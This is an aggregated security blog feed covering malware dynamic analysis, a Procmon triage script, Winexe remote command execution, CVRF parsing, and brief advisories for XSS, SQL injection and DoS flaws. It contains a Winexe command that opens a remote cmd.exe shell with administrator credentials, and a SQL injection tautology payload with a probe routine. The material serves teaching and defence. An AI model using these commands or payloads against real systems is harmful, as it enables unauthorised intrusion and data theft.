  3. Monitor network activity with ApateDNS or Wireshark. ApateDNS answers the sample's DNS queries with an address of your choosing, so you can see which domains it looks up and steer its traffic to a host you control, while Wireshark captures the actual packets.

    Wireshark Preview

  4. Test or examine the execution of the malware with a low-level debugger such as OllyDbg or WinDbg. A debugger is a program used to test or examine the execution of another program: it lets you set breakpoints, pause execution and inspect the program's state (registers, memory, call stack, API calls), and it recognises procedures, switch tables, constants and strings and locates routines from object files and libraries. Below is a snapshot of OllyDbg in action.

    Olly Debugger
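The dynamic steps above produce logs; the work is in reading them. As an added example (not part of the original post and not a Procmon or Regshot feature), the Python below runs a few triage rules over a Procmon CSV export: an executable dropped into a temp directory, a new value under an autorun key, the dropped file being launched, and an outbound connection. PROCMON_CSV is constructed for the example using Procmon's default export columns; the process names, paths and address in it are made up.

```python
import csv
import io

# Constructed Procmon-style CSV export using Procmon's default column set
# (Time of Day, Process Name, PID, Operation, Path, Result, Detail). The rows
# are made up for this example; they are not from a real sample.
PROCMON_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.0001","invoice.exe","1234","CreateFile","C:\\Users\\lab\\AppData\\Local\\Temp\\svchost.exe","SUCCESS","Desired Access: Generic Write"
"10:01:02.0002","invoice.exe","1234","WriteFile","C:\\Users\\lab\\AppData\\Local\\Temp\\svchost.exe","SUCCESS","Offset: 0, Length: 65536"
"10:01:02.0003","invoice.exe","1234","RegSetValue","HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater","SUCCESS","Type: REG_SZ, Data: C:\\Users\\lab\\AppData\\Local\\Temp\\svchost.exe"
"10:01:02.0004","invoice.exe","1234","Process Create","C:\\Users\\lab\\AppData\\Local\\Temp\\svchost.exe","SUCCESS","PID: 1300, Command line: svchost.exe -k"
"10:01:02.0005","svchost.exe","1300","TCP Connect","lab-vm:49152 -> 203.0.113.7:443","SUCCESS","Length: 0"
"10:01:02.0006","explorer.exe","900","RegQueryValue","HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","SUCCESS","Type: REG_DWORD, Data: 1"
"10:01:02.0007","invoice.exe","1234","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read"
"""

# Autostart registry locations (a Regshot diff usually shows new values here).
AUTORUN_KEYS = ("\\currentversion\\run", "\\currentcontrolset\\services")
# Directories a dropper typically writes its second stage to.
DROP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\programdata\\")
EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".vbs", ".ps1")

def triage_procmon(csv_text):
    """Walk the log once and return (process, finding, path) tuples,
    deduplicated, in the order each behaviour first appeared."""
    findings, seen, dropped = [], set(), set()
    for row in csv.DictReader(io.StringIO(csv_text)):
        op, path, proc = row["Operation"], row["Path"], row["Process Name"]
        low = path.lower()
        finding = None
        if op in ("CreateFile", "WriteFile") and low.endswith(EXEC_EXT) \
                and any(d in low for d in DROP_DIRS):
            dropped.add(low)
            finding = "dropped executable"
        elif op == "RegSetValue" and any(k in low for k in AUTORUN_KEYS):
            finding = "autorun persistence"
        elif op == "Process Create" and low in dropped:
            finding = "executed dropped file"
        elif op in ("TCP Connect", "UDP Send"):
            finding = "network connection"
        if finding and (proc, finding, path) not in seen:
            seen.add((proc, finding, path))
            findings.append((proc, finding, path))
    return findings

def summarize_by_process(csv_text):
    """Map each process to the sorted list of behaviours observed for it."""
    summary = {}
    for proc, finding, _ in triage_procmon(csv_text):
        summary.setdefault(proc, set()).add(finding)
    return {proc: sorted(kinds) for proc, kinds in summary.items()}

if __name__ == "__main__":
    for proc, finding, path in triage_procmon(PROCMON_CSV):
        print(f"{proc:14} {finding:22} {path}")
```

The rules are deliberately few; the point is that a dropper's "write to temp, register under Run, launch, call home" sequence is visible in the log order, and that the second-stage process (here the look-alike svchost.exe) carries its own PID, so the network connection must be attributed to it rather than to the original sample.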

 

 
- Shakeel

by Shakeel Bhat at October 30, 2013 01:49 PM

October 28, 2013

SecPod Research Blog

Hack VMware Remote Console (Firefox add-on) to Run Independently !!!

In Firefox version 3.6 or higher, the VMware Remote Console plug-in does not load properly. There is a small hack, described below, that lets us run VMware Remote Console on its own without keeping an older version of Firefox around.

Skip to step 5 if VMware Server and VMware Remote Console Plug-in are already installed.

1) Install the VMware Server 2.x

2) Access VMware Web Access Management
http://localhost:8222 OR https://localhost:8333

3) When we try to open the Console tab it complains: “The VMware Remote Console Plug-in is not installed or could not be found.”

4) Click on “Install plug-in” to install the VMware Remote Console Plug-in as a firefox add-on.

5) The VMware Remote Console plug-in is now inside “.mozilla” in your home directory, under the profile's “extensions” folder. The command below prints its path:
user@ubuntu# cd ~/.mozilla && find . -iname VMwareVMRC@vmware.com

6) Copy the VMware Remote Console plug-in directory to a path of your choosing (the profile directory name, acdnde.default here, differs from one installation to the next):
user@ubuntu# cp -r ./firefox/acdnde.default/extensions/VMwareVMRC@vmware.com ~/vmware-console

7) Change directory to “~/vmware-console/plugins/”, give “vmware-vmrc” execute permission and run it to get the VMware Remote Console window:
user@ubuntu# cd ~/vmware-console/plugins/
user@ubuntu# chmod +x vmware-vmrc
user@ubuntu# ./vmware-vmrc

The VMware Remote Console appears as shown below.

NOTE: If the “VMware Remote Console” window does not appear, set the “VMWARE_USE_SHIPPED_GTK” variable to “yes” and run it again:
user@ubuntu# export VMWARE_USE_SHIPPED_GTK=yes

8) Connect to the server by giving the VMware Server IP address with port 8333 (the HTTPS port) and credentials, as shown below.

vmware-console-01

9) If authentication succeeds, it lists the available “Virtual Images” on the VMware Server, as shown below.

vmware-console-02

10) Select the virtual image which we want to access.

Alternatively, we can extract the plug-in from the VMware Server installation located at
“/usr/lib/vmware/webAccess/tomcat/apache-tomcat-6.0.16/webapps/ui/plugin/vmware-vmrc-linux-x86.xpi” with “unzip vmware-vmrc-linux-x86.xpi” (an .xpi is an ordinary zip archive).

Repeat the same procedure from step 6.

This way we can run VMware Remote Console independently, without installing an old Firefox just to get at the console.

Cheers!!!
Veerendra GG

by Veerendra GG at October 28, 2013 05:50 PM

June 21, 2013

SecPod Research Blog

Run commands on Windows system remotely using Winexe

Winexe is a GNU/Linux application that allows users to execute commands remotely on Windows NT/2000/XP/2003/Vista/7/8 systems, much like PsExec does from Windows. It copies a small service (winexesvc) to the remote system over SMB, starts it, runs the command through it, and can remove the service again afterwards (the --uninstall option; by default the service is left in place for the next run). It needs an account with administrative rights on the target and allows execution of most of the Windows shell commands. Because the service installation is recorded in the target's System event log, the same activity is also a useful indicator when hunting for lateral movement.

How to install:
You can download the source package from here [Current version is winexe-1.00.tar.gz]

  1. tar -xvf winexe-1.00.tar.gz
  2. cd winexe-1.00/source4/
  3. ./autogen.sh
  4. ./configure
  5. make basics bin/winexe

This will create a [ winexe ] binary in the bin folder. You can use that binary to execute Windows commands from Linux.

Alternatively, pre-compiled binaries are available; you can download and use one from here.

How to use it:

  • ./winexe -U [Domain/]User%Password //host command

A password given after % shows up in the Linux host's process list and shell history; keep that in mind on shared or long-lived machines.

Examples:

  • ./winexe -U HOME/Administrator%Pass123 //192.168.0.1 "netstat -a"
  • ./winexe -U HOME/Administrator%Pass123 //192.168.0.1 "ipconfig -all"
  • ./winexe -U HOME/Administrator%Pass123 //192.168.0.1 "ping localhost"

To launch a Windows shell from inside your Linux box, use the command below:

./winexe -U HOME/Administrator%Pass123 //192.168.0.1 "cmd.exe"

winexe command execution

Winexe Binary

by Thanga Prakash at June 21, 2013 02:13 PM

June 15, 2013

SecPod Research Blog

Security is a process

There is no “magic box” security. I can’t buy a device in the market that can be plugged in somewhere and assume “I am safe”. Much like dreaming about an all-proof balloon that secures us from all diseases and attacks. There is no replacement for a healthy-diet program and being vigilant. It is the process of eating healthy, keeping yourself fit, getting adequate sleep, which builds our immunity. And being vigilant of the possible loopholes and fixing them in advance. On top of that, you add peep-through hole, burglar alarm, underground bunker, a bullet proof car or jacket or whatever else you think is necessary depending on your social status. If you are still attacked, you either go to the Doctor or Police. This entire thing is a “Process”.

To secure our computer systems we buy a firewall, set it up at the perimeter or at the endpoint and assume that our assets are secure. We forget that the firewall must allow the traffic we are interested in, and that traffic can carry malicious code. Then we go for anti-virus, which helps clean an infection after we have already been attacked. Sometimes we go for NIPS (Network Intrusion Prevention System) or HIPS (Host Intrusion Prevention System), which is where the balloon analogy applies: there is no fool-proof system that blocks all targeted attacks. All these are essential additional attachments depending on the social status (worth) of our assets. What we miss is the healthy-diet program, and that is vulnerability management: identifying the loopholes, fixing those weaknesses regularly and keeping the computer system healthy, which means security-hardening the system and applying patches regularly. This entire thing, including the additional attachments, is a “Process”.

by Chandra at June 15, 2013 08:47 AM

June 06, 2013

SecPod Research Blog

SecPod produces security advisories in CVRF format

SecPod intends to publish security advisories in an XML format that conforms
to the Common Vulnerability Reporting Framework (CVRF version 1.1).

What is CVRF?
The Common Vulnerability Reporting Framework is an XML-based standard that
enables sharing of vulnerability information in a machine-readable format.
Originally derived from the Internet Engineering Task Force (IETF) draft Incident
Object Description Exchange Format (IODEF), this format was then developed by
the Industry Consortium for Advancement of Security on the Internet (ICASI).

CVRF Provides Two Key Benefits:
(1) It provides a consistent way to depict security information thus simplifying
the interpretation of the advisories, and
(2) It provides a machine-readable format for the interpretation of security
advisories, thus allowing automation (and integration of the advisories in,
for example, vulnerability scanning tools).

More can be found here:
http://www.icasi.org/cvrf

One of our advisories in CVRF format:
Advantech WebAccess HMI/SCADA Software Persistence Cross-Site Scripting Vulnerability.
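As an added example (not SecPod's advisory or tooling), a reader for the CVRF 1.1 elements that matter for the automation the post mentions: the document ID, the product tree, and each vulnerability's CVE and per-product status, so a scanner can answer "is this installed version affected?" without a human reading the advisory. SAMPLE_CVRF is constructed for the example with placeholder product names, document ID and CVE number; the namespace URIs are those of CVRF 1.1.

```python
import xml.etree.ElementTree as ET

# CVRF 1.1 namespaces: the core document, the vulnerability section and
# the product tree each live in their own namespace.
NS = {
    "cvrf": "http://www.icasi.org/CVRF/schema/cvrf/1.1",
    "vuln": "http://www.icasi.org/CVRF/schema/vuln/1.1",
    "prod": "http://www.icasi.org/CVRF/schema/prod/1.1",
}

# Constructed CVRF 1.1 document for a hypothetical product. The IDs, product
# names and CVE number are placeholders made up for this example.
SAMPLE_CVRF = """<cvrfdoc xmlns="http://www.icasi.org/CVRF/schema/cvrf/1.1"
         xmlns:vuln="http://www.icasi.org/CVRF/schema/vuln/1.1"
         xmlns:prod="http://www.icasi.org/CVRF/schema/prod/1.1">
  <DocumentTitle>Example Widget Server persistent cross-site scripting</DocumentTitle>
  <DocumentType>Security Advisory</DocumentType>
  <DocumentPublisher Type="Other">
    <ContactDetails>research@example.invalid</ContactDetails>
  </DocumentPublisher>
  <DocumentTracking>
    <Identification><ID>EXAMPLE-2013-0001</ID></Identification>
    <Status>Final</Status>
    <Version>1.0</Version>
    <InitialReleaseDate>2013-06-06T00:00:00Z</InitialReleaseDate>
    <CurrentReleaseDate>2013-06-06T00:00:00Z</CurrentReleaseDate>
  </DocumentTracking>
  <prod:ProductTree>
    <prod:FullProductName ProductID="WS-1.0">Example Widget Server 1.0</prod:FullProductName>
    <prod:FullProductName ProductID="WS-1.1">Example Widget Server 1.1</prod:FullProductName>
    <prod:FullProductName ProductID="WS-1.2">Example Widget Server 1.2</prod:FullProductName>
  </prod:ProductTree>
  <vuln:Vulnerability Ordinal="1">
    <vuln:Title>Stored XSS via the 'desc' parameter</vuln:Title>
    <vuln:CVE>CVE-2013-0000</vuln:CVE>
    <vuln:ProductStatuses>
      <vuln:Status Type="Known Affected">
        <vuln:ProductID>WS-1.0</vuln:ProductID>
        <vuln:ProductID>WS-1.1</vuln:ProductID>
      </vuln:Status>
      <vuln:Status Type="Fixed">
        <vuln:ProductID>WS-1.2</vuln:ProductID>
      </vuln:Status>
    </vuln:ProductStatuses>
    <vuln:Remediations>
      <vuln:Remediation Type="Vendor Fix">
        <vuln:Description>Upgrade to Example Widget Server 1.2.</vuln:Description>
      </vuln:Remediation>
    </vuln:Remediations>
  </vuln:Vulnerability>
</cvrfdoc>
"""

def parse_cvrf(xml_text):
    """Reduce a CVRF document to the fields a scanner or tracker needs."""
    root = ET.fromstring(xml_text)
    # ProductID -> human-readable name, so statuses can be reported by name.
    products = {p.get("ProductID"): p.text
                for p in root.iterfind(".//prod:FullProductName", NS)}
    doc = {
        "title": root.findtext("cvrf:DocumentTitle", namespaces=NS),
        "id": root.findtext("cvrf:DocumentTracking/cvrf:Identification/cvrf:ID",
                            namespaces=NS),
        "vulnerabilities": [],
    }
    for v in root.iterfind("vuln:Vulnerability", NS):
        statuses = {}
        for st in v.iterfind("vuln:ProductStatuses/vuln:Status", NS):
            statuses[st.get("Type")] = [products.get(pid.text, pid.text)
                                        for pid in st.iterfind("vuln:ProductID", NS)]
        doc["vulnerabilities"].append({
            "title": v.findtext("vuln:Title", namespaces=NS),
            "cve": v.findtext("vuln:CVE", namespaces=NS),
            "affected": statuses.get("Known Affected", []),
            "fixed": statuses.get("Fixed", []),
            "remediations": [r.findtext("vuln:Description", namespaces=NS)
                             for r in v.iterfind("vuln:Remediations/vuln:Remediation", NS)],
        })
    return doc

def is_affected(doc, installed_product_name):
    """True if any vulnerability in the document lists this product as affected."""
    return any(installed_product_name in vu["affected"]
               for vu in doc["vulnerabilities"])

if __name__ == "__main__":
    parsed = parse_cvrf(SAMPLE_CVRF)
    print(parsed["id"], parsed["title"])
    for vu in parsed["vulnerabilities"]:
        print(vu["cve"], "affected:", vu["affected"], "fixed:", vu["fixed"])
```

Matching on the ProductTree names is the weak point of any such integration: the scanner's own inventory must use the same product naming as the advisory, which is why a real deployment keys on the ProductID values and maintains a mapping to its fingerprinted versions.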

by Antu at June 06, 2013 11:17 AM

May 29, 2013

SecPod Research Blog

Attacks are real, it would be naïve to think otherwise

All human beings have a part of the good and the bad. At times, bad takes over the good and other times, good takes over the bad. The fight between the good and the bad is not new.

Attacks do happen and can happen to anyone, anytime, sometimes with notice and mostly without notice. In major part of the civilized physical world, people live in peace mostly. We have been able to contain the bad to a greater extent and the world is seemingly peaceful at large. But, there again, thefts happen, raids happen, conflicts happen, accidents happen, killings happen, underworld exists.

In the digital world, where you cannot visualize the image of an attacker, where the traces of the attacker are hard to characterize, where everything is virtual, it becomes harder to bring order. It is easier for attackers of all forms (humans and bots) to exhibit their skills more freely. Just as you thought your introvert friend is so extrovert online.

In order for this writing to remain relevant, I would ask you to Google ‘recent malware attacks’; I am sure you will get a million results. There are any number of software applications and operating systems with vulnerabilities; there are spam and phishing attacks; there are sophisticated attacks (advanced persistent threats) and attacks on mobile devices; large banks are attacked, major news agencies are attacked, government establishments are attacked, and technology companies are attacked. Who is safe?

Attacks are real; it would be naïve to think otherwise.

Each one of us has experienced an attack of some kind, or of many kinds, at some point or at multiple points. If you haven't been one of the victims, you probably didn't realize your data was stolen, or didn't realize your system was used in one such attack, or you have been plain lucky.

So, what do attackers target?

It is mostly your data and information, your credit card, online bank account details, financial transactions, your identity profile, your health records, your company data, your business strategy, your productive hours. And there are sophisticated, well-funded, organized attackers who target countries, defense establishments, water and energy supply, nuclear establishments, manufacturing units, satellites. And there are others who mostly take out your peace.

As much as we embrace this digital world, we need to be prepared to deal with its adversaries too.

by Chandra at May 29, 2013 09:40 AM

May 24, 2013

SecPod Research Blog

What are we doing wrong in safeguarding our computer systems?

1. Naïve Belief: Who is interested in my system? Nobody is going to attack me. I haven’t done anything bad to anyone, so why will they?

2. Believing Security can be bought: that magic device that I bought will take care of everything.

3. Trusting Anti-virus is enough to safeguard the system: Feel safe once installed.

4. Cleaning instead of prevention: Trying to clean the malware after it has already infected instead of putting in all the measures that could have avoided the malware infection itself.

5. Ignoring proactive security measures: not proactively assessing the security posture of the system in order to fix the loopholes and strengthen it.

6. Not willing to take the hard step: patching and hardening is hard to do.

On the last point, yes, it is hard, because,

  • Users are not aware what patches to apply
  • It takes too long to download and install for each application
  • It takes away time from the core work
  • Not aware what the update might do

Hardening the security posture of the system, knowing the loopholes and applying the fix is a very effective and proven defense system. This requires a deeper or may be simpler, second look.

by Chandra at May 24, 2013 11:19 AM

April 22, 2013

SecPod Research Blog

Too much of an expectation?

Is it too much to expect an appropriate answer from Computer Science Engineering graduates for these questions,
- What does 32-bit computer really mean?
- What is word length?
- What is the length of a byte?
- What is the length of an IP address?
- What is the hardware address?
- What is the length of an Integer?

Most give us a blank look, puzzled that we ask such questions and wondering why at all we are worried about all these.

‘Sir, I have taken a Java course, why don't you ask questions on that? Nobody asks these questions in interviews, that's why I didn't prepare.’

Now, do you need preparation for these? Are these not elementary?

Alright, I oblige, is Java platform independent language?
‘Yes. ‘

How does Java achieve platform independence?
Puzzled again!

What was your favorite subject during your graduation?
C, C++

What about Non-Programming subject?
‘Non-programming, hmm…’

You didn’t study Operating System, Computer Networks?
‘Yes, but I haven’t prepared for it.’

Some questions to Electronics Engineering graduates which do not get answered,
- What is an ADC?
- Write an Adder circuit
- What is the RF range?

I understand that the industry as such has redefined “Computer Engineer” or “Software Engineer” to the extent that people often think it means anybody who can remember a few things in Java, ASP.Net etc. Many universities and colleges have invented “Information Technology” and “Information Science” degrees without actually helping the students understand the differences. It is also that teaching is considered low-profile, just as testing is foolishly considered low-profile.

At SecPod, we are trying to solve Computer Security problems and we really need Computer Science Engineers. I am confident there are really good people out there and we are on the hunt for them.

by Chandra at April 22, 2013 01:20 PM

April 02, 2013

SecPod Research Blog

Software Commoditization

Commoditization, in business, is the process by which branded and unique goods, software included, come to be seen as a simple commodity by the market or consumers (source: Wikipedia). As a market matures, commoditization tends to increase.

Opportunities stemming from Software Commoditization

‘Necessity is the mother of all inventions’ is a well-known proverb that fits this argument precisely. Nowadays, prominence is given to integrating existing hardware or solutions rather than programming anew; there is little necessity for fresh solutions right now. We have already benefited from hardware commoditization: the rise of PC clones replaced integrated proprietary systems with interchangeable parts available from multiple sources. Novel solutions are needed only where no cohesive solution already works well in the market. The rise of middleware and operating systems has helped commoditize many software layers and components, and the increase in free and open source software fuels commoditization further.

Price of software and hardware solutions has reasonably reduced. These solutions have become affordable to common man, encouraging them to discover various prospects in this software industry. This has given rise to many entrepreneurs in this profession and numerous solutions that have been able to build on these open source commodities.

There is a significant increase in technology convergence and standardization. For example, bundling is a common aspect of software solutions. A proprietary solution is often bundled with a commoditized solution and gains popularity in the market. There is a steady increase in the usage of many Linux distributions – Red Hat, Ubuntu, etc.

Commoditized solutions act as a baseline for many other software solutions and are a point of reference. Innovations are still there, may not be traditional ones, but commoditization has geared up many companies by revolutionizing new ideas fabricated upon these commoditized components.

Limitations stemming from Software Commoditization

Low priced software often compromise on quality of software. Numerous bugs are identified and a constant need for enhancement exists.

Many companies lack funding for research and development, so innovations are seldom from scratch. Software professionals need to design their approach around existing free solutions to keep costs low.

Competitions in market are an obvious fact of commoditization. Almost everyone is trying to grab the market and scale well by quoting low prices. Disruptive technologies are evolving due to commoditization.

Strategies to adapt to Commoditization

  1. Bundling software is a very effective strategy. Proprietary software can be bundled with commoditized component to gain prominent status in market and win customers.
  2. Patents are often used as a strategy against commoditization. Trademarks, registered software and copyrights are some approaches used by companies to an advantage in market.
  3. Knowledge of middleware can facilitate opportunities for better growth in this era of software industry.
  4. Building a brand using commoditized components and leaving the rest to customer decision is often a safe approach. Example: using YouTube and blogs, or providing evaluation copy of software to demonstrate the power of our software can work well in this market.

Time has to be given to this trend to downsize. Many approaches and strategies can be listed here to adapt to commoditization. Software industry is maturing fast. Time changes drastically in this industry. There are no fixed set of rules. Every software professional must decide and analyze their stratagem to actualize their approach to acclimate to commoditization.

 

by Preeti Subramanian at April 02, 2013 11:50 AM

Benefits and Limitations of Middleware

Have you ever felt the ease of developing any application or idea that strikes your mind? Thanks to the evolution of middleware, that has helped us develop diverse software programs without perturbing ourselves about the core operating system or hardware.

Middleware is reusable infrastructure software residing between applications and the underlying operating systems, networks and hardware.

Benefits of Middleware

Middleware has primarily given us portability. It effectively manages memory allocation and relocation, data, processes, states, and replication. An assortment of applications can run at the same time. Parallel programming has become smooth to the tip of our fingers. It leverages hardware and software technological advances. It controls end-to-end resources and quality of service.

Numerous libraries cater to the basic or complex needs of our software. We are at ease; we can make the same piece of code work on any platform; we can program fast and there is less work. In the recent times, many applications have been developed with the help of readymade solutions and libraries offered by this layer. So development is quick, hence implementation time in the software life cycle has fairly reduced. Evolution of new requirements in software and environment is guaranteed with middleware.

There is a market for software developers who are hired for developing applications on middleware, Java developers, and Android developers. Also, the availability of such developers is vast, therefore hiring and putting them straight to work with some amount of basic training works well in many software companies.

Limitations of Middleware

For critical applications, performance is a major factor in whether an application can thrive in this competitive world of abundant applications. For many applications performance is not critical, so it is generally a trade-off. Because of this middleware shield, we hardly get to design our software for performance: most memory-management and resource-usage decisions are made by the middleware, so tailoring the software at those levels is not possible.

With the genesis of middleware, large applications have evolved, sustaining of these remains a concern for software developers. We have a wide variety of programs to perform various tasks. It is required to put consistent time to support such software in long run.

Last but most important, there are competitive advantages of providing custom proprietary solutions. It makes it stand-out and precisely caters to real needs of customers. There is a certain demand for such software that needs to address tailored needs of clients. Getting employees to work such tasks is fairly difficult because it requires assured expertise.

Summarizing the above, it is the collective decision of architects and developers to elect what is the requirement of their software and what can be traded-off to best suit their needs.

by Preeti Subramanian at April 02, 2013 11:45 AM

March 09, 2013

Nth Dimension/:: Negatively discriminating against idiots since 1995!

A brief look at the Acer ChromeBook #2

In my previous post on the Acer ChromeBook, I discussed the Crosh shell. Today I'm going to examine another default extension which I mentioned previously which had caught my eye....

by timb@machine.org.uk (Tim Brown) at March 09, 2013 11:48 PM

January 08, 2013

SecPod Research Blog

Advantech WebAccess HMI/SCADA Persistent Cross-Site Scripting Vulnerability

SecPod Research Team member (Antu Sanadi) has found a Persistent Cross-Site Scripting Vulnerability in Advantech WebAccess HMI/SCADA. The vulnerability is caused by improper validation of the ‘ProjDesc’ parameter in ‘broadWeb/include/gAddNew.asp’ (when tableName=pProject is set). Because the value is stored, injected script runs for every user who later views it; this may allow an attacker to steal cookie-based authentication credentials, compromise the application, or access or modify data in the context of the affected user, which in an HMI/SCADA product means operator sessions.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at January 08, 2013 06:51 AM

January 07, 2013

Nth Dimension/:: Negatively discriminating against idiots since 1995!

A brief look at the Acer ChromeBook #1

After some fairly heavy advertising from Google, I was recently persuaded to stump up the cash for an Acer ChromeBook. This post discusses some of my initial observations. Whilst the ChromeBook can be run in a developer mode, I have so far opted to avoid this, with the intention of hunting for bugs that can be exploited as a typical user. Most of my explorations so far have revolved around the default extensions that are shipped by default. Two in particular have caught my eye so far, notably the Crosh shell and the File application so let's look at them in a bit more depth....

by timb@machine.org.uk (Tim Brown) at January 07, 2013 03:12 AM

December 02, 2012

Nth Dimension/:: Negatively discriminating against idiots since 1995!

Dead bugs society

Background: A colleague asked me about fuzzing PHP. Verbatim from my email to security@php.net back in 2007: I've been doing some work on fuzzing the PHP 4 and PHP 5 parsers and wanted to share my results with you. I know PHP 4 won't be supported for much longer and I have no idea whether any of these examples are directly exploitable however before I make them public I thought it was only right to give you a chance to comment. Feel free to ignore me if you so choose, but I'll be putting them up on my blog in 14 days unless I hear otherwise. Although I'm reporting them against the CGI binary, I've had similar results running these snippets against the module too. In each case, I can cause the process (either the CGI binary or the module) to crash. The fuzzers I've written are also available if you so wish....

by timb@machine.org.uk (Tim Brown) at December 02, 2012 02:59 AM

September 19, 2012

Nth Dimension/:: Negatively discriminating against idiots since 1995!

A brief look at the RIM PlayBook

Disclaimer: I've only had a brief look at 1.x so far and only under VMware. I do have a PlayBook which I'll be breaking in due course but right now it's still in the box. These notes have been floating around in one form or another privately for a while but I wanted to commit them publicly since I'm not sure when I will find time to continue playing....

by timb@machine.org.uk (Tim Brown) at September 19, 2012 08:21 AM

July 16, 2012

SecPod Research Blog

Oxide Webserver Remote Denial of Service Vulnerability

SecPod Research Team member (Antu Sanadi) has found a Denial of Service Vulnerability in Oxide Webserver. The vulnerability is caused by an error in handling certain crafted characters in HTTP GET requests, which allows remote attackers to crash the service.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at July 16, 2012 10:34 AM

NetArt Media Pharmacy System SQL Injection and Cross-site Scripting Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found Cross-Site Scripting and SQL Injection Vulnerabilities in NetArt Media Pharmacy System. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at July 16, 2012 10:24 AM

NetArt Media iBoutique SQL Injection Vulnerability

SecPod Research Team member (Antu Sanadi) has found an SQL Injection Vulnerability in NetArt Media iBoutique. The vulnerability is caused by improper validation of the ‘key’ parameter in ‘/index.php’. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at July 16, 2012 10:20 AM

June 20, 2012

SecPod Research Blog

Adiscon LogAnalyzer ‘highlight’ Parameter Cross Site Scripting Vulnerability

SecPod Research Team member (Sooraj K.S) has found a Cross-Site Scripting Vulnerability in Adiscon LogAnalyzer. The vulnerability is caused by improper validation of the “highlight” parameter in “index.php”. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

CVE Info : CVE-2012-3790

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at June 20, 2012 05:24 AM

March 30, 2012

SecPod Research Blog

ArticleSetup Multiple Persistent Cross-Site Scripting and SQL Injection Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found Multiple Persistent Cross-Site Scripting and SQL Injection Vulnerabilities in ArticleSetup. The vulnerabilities are caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
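The SQL injection class reported here and in the two NetArt Media advisories above (Pharmacy System and the iBoutique ‘key’ parameter), as an added example that is not code from those products or from SecPod: a query built by string concatenation beside its parameterised fix, both run against a constructed in-memory SQLite table, and the differential check a scanner uses to tell the two apart without knowing the schema. Table, rows and the probe string are made up for the example.

```python
import sqlite3

def make_db():
    """Constructed in-memory catalogue standing in for an application's database;
    the hidden row is what the WHERE clause is supposed to keep out of results."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, hidden INTEGER);
        INSERT INTO products VALUES (1, 'Aspirin', 0);
        INSERT INTO products VALUES (2, 'Bandage', 0);
        INSERT INTO products VALUES (3, 'Internal price list', 1);
    """)
    return db

def search_vulnerable(db, key):
    # The request parameter is pasted into the SQL text, so a quote in it
    # ends the pattern and whatever follows is parsed as SQL.
    sql = ("SELECT name FROM products WHERE hidden = 0 AND name LIKE '%"
           + key + "%' ORDER BY id")
    return [row[0] for row in db.execute(sql)]

def search_fixed(db, key):
    # Bound parameter: the value travels separately from the statement and
    # can never change its structure, whatever characters it contains.
    sql = "SELECT name FROM products WHERE hidden = 0 AND name LIKE ? ORDER BY id"
    return [row[0] for row in db.execute(sql, ("%" + key + "%",))]

# Constructed probe: the quote closes the LIKE pattern, OR adds a tautology,
# and the trailing '1 absorbs the %' that the application appends, so the
# statement stays syntactically valid.
TAUTOLOGY = "x' OR '1%'='1"

def differential_check(search, db):
    """Scanner-style test: a nonsense key should return nothing; if the same
    key inside a tautology returns rows, the key reaches the SQL text unescaped."""
    baseline = search(db, "zzqxv")
    probe = search(db, "zzqxv' OR '1%'='1")
    return len(probe) > len(baseline)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, TAUTOLOGY))   # hidden row leaks
    print("fixed:     ", search_fixed(db, TAUTOLOGY))        # nothing matches
    print("injectable:", differential_check(search_vulnerable, db),
          differential_check(search_fixed, db))
```

With the concatenated query the tautology turns the WHERE clause into (hidden = 0 AND name LIKE '%x') OR '1%'='1%', which is true for every row, including the hidden one; the bound-parameter version just searches for a product whose name contains the literal probe string.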

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at March 30, 2012 05:40 AM

JAMWiki ‘num’ Parameter Cross Site Scripting Vulnerability

SecPod Research Team member (Sooraj K.S) has found a Cross-Site Scripting Vulnerability in JAMWiki. The vulnerability is caused by improper validation of the “num” parameter in “Special:AllPages” pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at March 30, 2012 05:30 AM

February 28, 2012

SecPod Research Blog

Netmechanica NetDecision HTTP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a Denial Of Service Vulnerability in Netmechanica NetDecision HTTP Server. The vulnerability is caused by improper validation of an overlong HTTP request sent to the web server, which allows remote attackers to crash the service.

POC : Download here.

More information can be found here.

CVE Info : CVE-2012-1465

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at February 28, 2012 05:09 AM

Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found an Information Disclosure Vulnerability in Netmechanica NetDecision Traffic Grapher Server. The vulnerability is caused by improper validation of a malicious HTTP GET request for ‘default.nd’ that carries an invalid HTTP version number followed by multiple ‘CRLF’ sequences; the server responds with the source code of ‘default.nd’.

POC : Download here.

More information can be found here.

CVE Info : CVE-2012-1466

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

